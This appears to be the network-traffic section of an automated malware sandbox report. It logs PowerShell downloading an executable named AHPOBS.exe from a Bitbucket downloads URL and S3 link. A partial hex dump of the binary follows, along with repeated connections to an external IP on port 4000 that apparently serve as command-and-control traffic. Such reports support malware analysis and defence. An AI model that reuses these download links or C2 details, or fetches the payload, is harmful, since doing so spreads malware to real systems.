                                    Dec 24, 2024 09:02:28.915740967 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.915774107 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.922158957 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.922209024 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.922234058 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.922250032 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.922272921 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.928484917 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.928524971 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.928555965 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.928569078 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.928611040 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.928643942 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.934725046 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.934741974 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.934838057 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.934853077 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.934896946 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.935533047 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.940970898 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.940994978 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.941036940 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.941050053 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.941085100 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.947539091 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.947599888 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.947635889 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.947686911 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.947725058 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.947746038 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.953773022 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.953793049 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.953830957 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.953846931 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.953869104 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.953895092 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.962703943 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.962726116 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.962826014 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.962841034 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.969291925 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.969381094 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.969400883 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.969414949 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.969439983 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.969469070 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.975521088 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.975547075 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.975613117 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.975614071 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.975622892 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.975663900 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.981822968 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.981842995 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.981865883 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.982021093 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.982027054 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.982209921 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.983485937 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.983546972 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.983550072 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.983561993 CET443497053.5.8.193192.168.2.5
                                    Dec 24, 2024 09:02:28.983604908 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:02:28.983884096 CET49705443192.168.2.53.5.8.193
                                    Dec 24, 2024 09:03:09.145598888 CET498084000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:03:09.265111923 CET400049808172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:03:09.265239954 CET498084000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:03:09.265640974 CET498084000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:03:09.385081053 CET400049808172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:03:31.160300016 CET400049808172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:03:31.160360098 CET498084000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:03:31.195436001 CET498084000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:03:31.224771976 CET498594000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:03:31.314924002 CET400049808172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:03:31.344445944 CET400049859172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:03:31.344542027 CET498594000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:03:31.346838951 CET498594000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:03:31.466253042 CET400049859172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:03:53.238806009 CET400049859172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:03:53.238895893 CET498594000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:03:53.299624920 CET498594000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:03:53.315331936 CET499104000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:03:53.419130087 CET400049859172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:03:53.434828043 CET400049910172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:03:53.434916973 CET499104000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:03:53.435333014 CET499104000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:03:53.554780960 CET400049910172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:04:15.333718061 CET400049910172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:04:15.333838940 CET499104000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:15.387428999 CET499104000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:15.403472900 CET499614000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:15.507052898 CET400049910172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:04:15.523174047 CET400049961172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:04:15.523320913 CET499614000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:15.523617983 CET499614000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:15.643069029 CET400049961172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:04:37.427429914 CET400049961172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:04:37.427786112 CET499614000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:37.430354118 CET499614000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:37.446629047 CET499824000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:37.549870968 CET400049961172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:04:37.566212893 CET400049982172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:04:37.566343069 CET499824000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:37.566782951 CET499824000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:37.686255932 CET400049982172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:04:59.458991051 CET400049982172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:04:59.459089041 CET499824000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:59.475285053 CET499824000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:59.491374016 CET499834000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:59.596375942 CET400049982172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:04:59.614228010 CET400049983172.232.216.250192.168.2.5
                                    Dec 24, 2024 09:04:59.614370108 CET499834000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:59.614749908 CET499834000192.168.2.5172.232.216.250
                                    Dec 24, 2024 09:04:59.734352112 CET400049983172.232.216.250192.168.2.5

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 24, 2024 09:02:22.241790056 CET5814753192.168.2.51.1.1.1
                                    Dec 24, 2024 09:02:22.378411055 CET53581471.1.1.1192.168.2.5
                                    Dec 24, 2024 09:02:24.684047937 CET5819553192.168.2.51.1.1.1
                                    Dec 24, 2024 09:02:24.966599941 CET53581951.1.1.1192.168.2.5

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 24, 2024 09:02:22.241790056 CET192.168.2.51.1.1.10xfcc8Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                    Dec 24, 2024 09:02:24.684047937 CET192.168.2.51.1.1.10x8e58Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 24, 2024 09:02:22.378411055 CET1.1.1.1192.168.2.50xfcc8No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                    Dec 24, 2024 09:02:22.378411055 CET1.1.1.1192.168.2.50xfcc8No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                    Dec 24, 2024 09:02:22.378411055 CET1.1.1.1192.168.2.50xfcc8No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                    Dec 24, 2024 09:02:24.966599941 CET1.1.1.1192.168.2.50x8e58No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                    Dec 24, 2024 09:02:24.966599941 CET1.1.1.1192.168.2.50x8e58No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                    Dec 24, 2024 09:02:24.966599941 CET1.1.1.1192.168.2.50x8e58No error (0)s3-w.us-east-1.amazonaws.com3.5.8.193A (IP address)IN (0x0001)false
                                    Dec 24, 2024 09:02:24.966599941 CET1.1.1.1192.168.2.50x8e58No error (0)s3-w.us-east-1.amazonaws.com16.182.71.81A (IP address)IN (0x0001)false
                                    Dec 24, 2024 09:02:24.966599941 CET1.1.1.1192.168.2.50x8e58No error (0)s3-w.us-east-1.amazonaws.com3.5.12.48A (IP address)IN (0x0001)false
                                    Dec 24, 2024 09:02:24.966599941 CET1.1.1.1192.168.2.50x8e58No error (0)s3-w.us-east-1.amazonaws.com54.231.129.137A (IP address)IN (0x0001)false
                                    Dec 24, 2024 09:02:24.966599941 CET1.1.1.1192.168.2.50x8e58No error (0)s3-w.us-east-1.amazonaws.com52.216.39.17A (IP address)IN (0x0001)false
                                    Dec 24, 2024 09:02:24.966599941 CET1.1.1.1192.168.2.50x8e58No error (0)s3-w.us-east-1.amazonaws.com16.182.100.41A (IP address)IN (0x0001)false
                                    Dec 24, 2024 09:02:24.966599941 CET1.1.1.1192.168.2.50x8e58No error (0)s3-w.us-east-1.amazonaws.com3.5.24.172A (IP address)IN (0x0001)false
                                    Dec 24, 2024 09:02:24.966599941 CET1.1.1.1192.168.2.50x8e58No error (0)s3-w.us-east-1.amazonaws.com3.5.28.247A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • bitbucket.org
                                    • bbuseruploads.s3.amazonaws.com

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.549704185.166.143.494436340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-24 08:02:24 UTC109OUTGET /mynewworkspace123312/scnd/downloads/AHPOBS.exe HTTP/1.1
                                    Host: bitbucket.org
                                    Connection: Keep-Alive
                                    2024-12-24 08:02:24 UTC5918INHTTP/1.1 302 Found
                                    Date: Tue, 24 Dec 2024 08:02:24 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 0
                                    Server: AtlassianEdge
                                    Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/cf91d8e4-02a0-4397-82bb-bdba0a1c2844/AHPOBS.exe?response-content-disposition=attachment%3B%20filename%3D%22AHPOBS.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZLOXG2B&Signature=SWcM%2FOPeR%2BxliX6J91lSOPwmbQQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJHMEUCICYvR56NrQqFga3kiY1aQut3DfJ%2F3mouCTxMKwxxvlu9AiEAzRhWhoYfwpU93W5Kbmk%2F0oFd8SYZ7SecTeJWwbrr4q8qsAII6f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNT8poD5wcY6mW%2FA9CqEAsyA5lBS36qs0C9g9fabbm0%2BVPJMoKBXvx06v5%2Bhz4MgRV76W4zkdth%2BCfqilJsCo1BEjkNvg0i27Nz7jMqfQuuIPabkIIZ8Jx0JPukqPqdaH2Br%2FJfu%2BbniBu%2FF%2BMDbd6sGF6faz5wxQbZrU9mN6UV2zn6lvu%2BVHhzGTsDSS%2BMrycK8iTHC2yvERkyiZy7JbG%2BP2dGK3Q%2FftHqyyhaseC0Ew4%2FSdXJlfsKXP7vCUL86eSou6pISsSLwuDc%2Byrgz0Stvci9kY%2F7ciYEzd1oCJ0cmOCOC5nDZvo%2FjmidwltfgIvSSK44XdxhPAAdlx4hmiuIgWsQl9%2Biqj8YhkLMQy22TRNHaMKTUqbsGOp0BTHIfIOC4Yhi8ptO9erjj5vxgbcnFwUWN2iNmempfYjp0od53cyJ%2Fs4GEYpDAK6GmYToRGlTJNyLpnp5mWyllHFhlS4MgW [TRUNCATED]
                                    Expires: Tue, 24 Dec 2024 08:02:24 GMT
                                    Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                    X-Used-Mesh: False
                                    Vary: Accept-Language, Origin
                                    Content-Language: en
                                    X-View-Name: bitbucket.apps.downloads.views.download_file
                                    X-Dc-Location: Micros-3
                                    X-Served-By: 744b66c4d28f
                                    X-Version: c9b3998323c0
                                    X-Static-Version: c9b3998323c0
                                    X-Request-Count: 3477
                                    X-Render-Time: 0.05045938491821289
                                    X-B3-Traceid: 83626b3fffaa4d489e906788edef701e
                                    X-B3-Spanid: 0e5bd62b4432d338
                                    X-Frame-Options: SAMEORIGIN
                                    Content-Security-Policy: base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassian [TRUNCATED]
                                    X-Usage-Quota-Remaining: 999081.663
                                    X-Usage-Request-Cost: 932.90
                                    X-Usage-User-Time: 0.027935
                                    X-Usage-System-Time: 0.000052
                                    X-Usage-Input-Ops: 0
                                    X-Usage-Output-Ops: 0
                                    Age: 0
                                    X-Cache: MISS
                                    X-Content-Type-Options: nosniff
                                    X-Xss-Protection: 1; mode=block
                                    Atl-Traceid: 83626b3fffaa4d489e906788edef701e
                                    Atl-Request-Id: 83626b3f-ffaa-4d48-9e90-6788edef701e
                                    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                    Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                    Server-Timing: atl-edge;dur=159,atl-edge-internal;dur=3,atl-edge-upstream;dur=158,atl-edge-pop;desc="aws-eu-central-1"
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.5497053.5.8.1934436340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-24 08:02:26 UTC1201OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/cf91d8e4-02a0-4397-82bb-bdba0a1c2844/AHPOBS.exe?response-content-disposition=attachment%3B%20filename%3D%22AHPOBS.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZLOXG2B&Signature=SWcM%2FOPeR%2BxliX6J91lSOPwmbQQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJHMEUCICYvR56NrQqFga3kiY1aQut3DfJ%2F3mouCTxMKwxxvlu9AiEAzRhWhoYfwpU93W5Kbmk%2F0oFd8SYZ7SecTeJWwbrr4q8qsAII6f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNT8poD5wcY6mW%2FA9CqEAsyA5lBS36qs0C9g9fabbm0%2BVPJMoKBXvx06v5%2Bhz4MgRV76W4zkdth%2BCfqilJsCo1BEjkNvg0i27Nz7jMqfQuuIPabkIIZ8Jx0JPukqPqdaH2Br%2FJfu%2BbniBu%2FF%2BMDbd6sGF6faz5wxQbZrU9mN6UV2zn6lvu%2BVHhzGTsDSS%2BMrycK8iTHC2yvERkyiZy7JbG%2BP2dGK3Q%2FftHqyyhaseC0Ew4%2FSdXJlfsKXP7vCUL86eSou6pISsSLwuDc%2Byrgz0Stvci9kY%2F7ciYEzd1oCJ0cmOCOC5nDZvo%2FjmidwltfgIvSSK44XdxhPAAdlx4hmiuIgWsQl9%2Biqj8YhkLMQy22TRNHaMKTUqbsGOp0BTHIfIOC4Yhi8ptO9erjj5vxgbcnFwUWN2iNmempfYjp0od53cyJ%2Fs4GEYpDAK6GmYToRGlTJNyLpnp5mWyllHFhlS4MgWZ%2FiOhFUhQFfPxKT6JeUDOj0QsfykBEnb3FQyIvkEHL [TRUNCATED]
                                    Host: bbuseruploads.s3.amazonaws.com
                                    Connection: Keep-Alive
                                    2024-12-24 08:02:26 UTC552INHTTP/1.1 200 OK
                                    x-amz-id-2: d/p+jzylfJRmN9MWblCPoAu1J87FPz5SdiiJOJzSvscmgtsFZF0lWUolqkFkZNaO7Jz/IYgrmus4qFx6+eAG8g==
                                    x-amz-request-id: GAQ4PR85YEGASFW8
                                    Date: Tue, 24 Dec 2024 08:02:27 GMT
                                    Last-Modified: Sun, 22 Dec 2024 20:40:32 GMT
                                    ETag: "a9c526f3a276012d554ac382a90bca3d"
                                    x-amz-server-side-encryption: AES256
                                    x-amz-version-id: 0781A17dsPoAtEV2mTFX.98ZpLby1B1o
                                    Content-Disposition: attachment; filename="AHPOBS.exe"
                                    Accept-Ranges: bytes
                                    Content-Type: application/x-msdownload
                                    Content-Length: 1136091
                                    Server: AmazonS3
                                    Connection: close
                                    2024-12-24 08:02:26 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c2 1e 94 bf 86 7f fa ec 86 7f fa ec 86 7f fa ec 15 31 62 ec 84 7f fa ec 9d e2 50 ec 29 7f fa ec 9d e2 51 ec b3 7f fa ec 8f 07 79 ec 8f 7f fa ec 8f 07 69 ec a7 7f fa ec 86 7f fb ec 96 7d fa ec 9d e2 4e ec ce 7f fa ec 9d e2 64 ec 9a 7f fa ec 9d e2 60 ec 87 7f fa ec 86 7f 6d ec 87 7f fa ec 9d e2 67 ec 87 7f fa ec 52 69 63 68 86 7f fa ec 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1bP)Qyi}Nd`mgRichPEL
                                    2024-12-24 08:02:26 UTC472INData Raw: 49 00 9c a6 48 00 a3 a0 35 49 00 c7 05 a4 35 49 00 02 00 00 00 c7 05 ac 35 49 00 8c a6 48 00 c7 05 c4 35 49 00 02 00 00 00 89 0d c8 35 49 00 c7 05 d0 35 49 00 78 a6 48 00 a3 e8 35 49 00 a3 ec 35 49 00 c7 05 f4 35 49 00 60 a6 48 00 a3 0c 36 49 00 c7 05 10 36 49 00 02 00 00 00 c7 05 18 36 49 00 50 a6 48 00 c7 05 30 36 49 00 02 00 00 00 89 0d 34 36 49 00 c7 05 3c 36 49 00 3c a6 48 00 a3 54 36 49 00 c7 05 58 36 49 00 02 00 00 00 c7 05 60 36 49 00 2c a6 48 00 89 0d 78 36 49 00 c7 05 7c 36 49 00 43 00 00 00 c7 05 84 36 49 00 0c a6 48 00 c7 05 9c 36 49 00 02 00 00 00 c7 05 a0 36 49 00 42 00 00 00 c7 05 a8 36 49 00 ec a5 48 00 89 1d b8 36 49 00 89 1d bc 36 49 00 a3 c0 36 49 00 a3 c4 36 49 00 bb f1 75 45 00 89 1d d8 36 49 00 33 db 89 1d dc 36 49 00 89 1d e0 36 49
                                    Data Ascii: IH5I5I5IH5I5I5IxH5I5I5I`H6I6I6IPH06I46I<6I<HT6IX6I`6I,Hx6I|6IC6IH6I6IB6IH6I6I6I6IuE6I36I6I
                                    2024-12-24 08:02:27 UTC16384INData Raw: 36 49 00 c8 a5 48 00 a3 e4 36 49 00 a3 e8 36 49 00 c7 05 f0 36 49 00 a0 a5 48 00 89 0d 08 37 49 00 89 0d 0c 37 49 00 c7 05 14 37 49 00 8c a5 48 00 a3 2c 37 49 00 a3 30 37 49 00 c7 05 38 37 49 00 7c a5 48 00 a3 50 37 49 00 a3 54 37 49 00 c7 05 5c 37 49 00 5c a5 48 00 a3 74 37 49 00 c7 05 78 37 49 00 02 00 00 00 c7 05 80 37 49 00 38 a5 48 00 c7 05 98 37 49 00 02 00 00 00 89 0d 9c 37 49 00 c7 05 a4 37 49 00 18 a5 48 00 a3 bc 37 49 00 c7 05 c0 37 49 00 02 00 00 00 c7 05 c8 37 49 00 f4 a4 48 00 a3 e0 37 49 00 a3 e4 37 49 00 c7 05 ec 37 49 00 d0 a4 48 00 89 0d 04 38 49 00 89 35 08 38 49 00 c7 05 10 38 49 00 b4 a4 48 00 89 1d 20 38 49 00 89 1d 24 38 49 00 a3 28 38 49 00 a3 2c 38 49 00 c7 05 34 38 49 00 8c a4 48 00 bb 3e d5 45 00 89 1d 40 38 49 00 33 db 89 1d 44
                                    Data Ascii: 6IH6I6I6IH7I7I7IH,7I07I87I|HP7IT7I\7I\Ht7Ix7I7I8H7I7I7IH7I7I7IH7I7I7IH8I58I8IH 8I$8I(8I,8I48IH>E@8I3D
                                    2024-12-24 08:02:27 UTC1024INData Raw: 01 39 5d f8 0f 83 8a 00 00 00 eb 02 33 c0 8d 55 e4 52 8b f7 89 45 e4 c7 45 ec 01 00 00 00 89 45 f0 e8 12 2c 00 00 8b 4f 04 8b 47 08 8b 44 81 fc 8b 75 0c 8b 4d 08 53 50 8d 55 f8 52 56 e8 66 19 00 00 85 c0 0f 85 e3 fb 01 00 8b 45 10 ff 00 8b 45 f8 3b c3 74 36 8b 4e 04 8b 14 81 66 83 7a 08 40 0f 85 b0 fb 01 00 8d 48 01 3b cb 0f 84 a5 fb 01 00 8d 75 e4 89 4d f8 e8 eb 00 00 00 39 5d f8 72 8a 33 c0 5e 5b 8b e5 5d c2 0c 00 8d 75 e4 e8 d4 00 00 00 33 c0 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 3b 5d 08 74 1d 56 57 8b 7d 08 8b f3 e8 ac 00 00 00 8b 47 08 89 43 08 83 f8 01 75 0c 8b 17 89 13 5f 5e 8b c3 5d c2 04 00 48 83 f8 0b 77 f2 ff 24 85 08 8f 40 00 dd 07 5f dd 1b 5e 8b c3 5d c2 04 00 6a 10 e8 0c 87 00 00 83 c4 04 85 c0 74 26 8b 7f 0c 8b 17
                                    Data Ascii: 9]3UREEE,OGDuMSPURVfEE;t6Nfz@H;uM9]r3^[]u3^[]U;]tVW}GCu_^]Hw$@_^]jt&
                                    2024-12-24 08:02:27 UTC16384INData Raw: cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 81 ec 4c 01 00 00 53 56 57 8b f9 8b 87 ec 00 00 00 3d 3c 0f 00 00 0f 8d ab 45 02 00 40 89 7c 24 24 89 87 ec 00 00 00 83 f8 01 0f 84 6a 03 00 00 80 bf fc 00 00 00 00 c6 87 44 01 00 00 00 0f 85 5c 01 00 00 8d 9b 00 00 00 00 80 bf 44 01 00 00 00 0f 85 49 01 00 00 80 3d e3 74 49 00 00 75 44 80 3d 68 86 4a 00 00 0f 85 78 45 02 00 8b 35 08 27 48 00 6a 01 6a 00 6a 00 6a 00 8d 44 24 78 50 ff d6 85 c0 0f 85 b0 02 00 00 80 3d e6 74 49 00 01 0f 84 76 45 02 00 83 bf f8 00 00 00 01 0f 84 b1 4e 02 00 83 3d 24 86 4a 00 00 0f 85 79 45 02 00 80 3d ec 74 49 00 01 0f 84 1c 46 02 00 83 bf 60 04 00 00 00 0f 85 29 46 02 00 80 3d 3c 86 4a 00 00 0f 85 6d 47 02 00 57 e8 ec fe ff ff 3c 01 0f 84 ad 00 00 00 80 3d b0 87 4a 00 00 0f 85 7b 49
                                    Data Ascii: ULSVW=<E@|$$jD\DI=tIuD=hJxE5'HjjjjD$xP=tIvEN=$JyE=tIF`)F=<JmGW<=J{I
                                    2024-12-24 08:02:27 UTC1024INData Raw: 84 3c 00 00 01 7e 04 8b 46 04 8b 0e 83 c4 0c 33 d2 66 89 14 41 5f 8b c6 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 53 56 8b f0 8b 46 0c 83 38 01 0f 8f c1 97 01 00 8b df 8b c6 e8 87 ff ff ff 5e 5b c3 cc cc cc cc 55 8b ec 83 ec 10 56 57 8d 45 f8 50 8b f9 ff 15 94 21 48 00 8b 75 0c 85 c0 0f 84 86 9c 01 00 df 6d f8 dd 5d f0 e8 f6 bc ff ff dd 45 f0 c7 46 08 03 00 00 00 dd 1e 5f 33 c0 5e 8b e5 5d c2 08 00 56 85 d2 74 11 66 8b 30 66 3b 31 75 0d 83 c0 02 83 c1 02 4a 75 ef 33 c0 5e c3 0f b7 00 66 3b 01 5e 1b c0 83 e0 fe 40 c3 cc cc cc cc cc cc cc cc 6a 10 c7 43 08 04 00 00 00 e8 39 43 00 00 83 c4 04 85 c0 0f 84 8d 93 01 00 56 57 bf a8 4e 48 00 8b f0 e8 59 48 ff ff 5f 5e 89 43 0c 8b c3 c3 cc 53 33 db 57 8d 4e 14 89 1e e8 a2 e9 ff ff 8d 4e 24 e8 9a e9 ff ff 8d
                                    Data Ascii: <~F3fA_^]SVF8^[UVWEP!Hum]EF_3^]Vtf0f;1uJu3^f;^@jC9CVWNHYH_^CS3WNN$
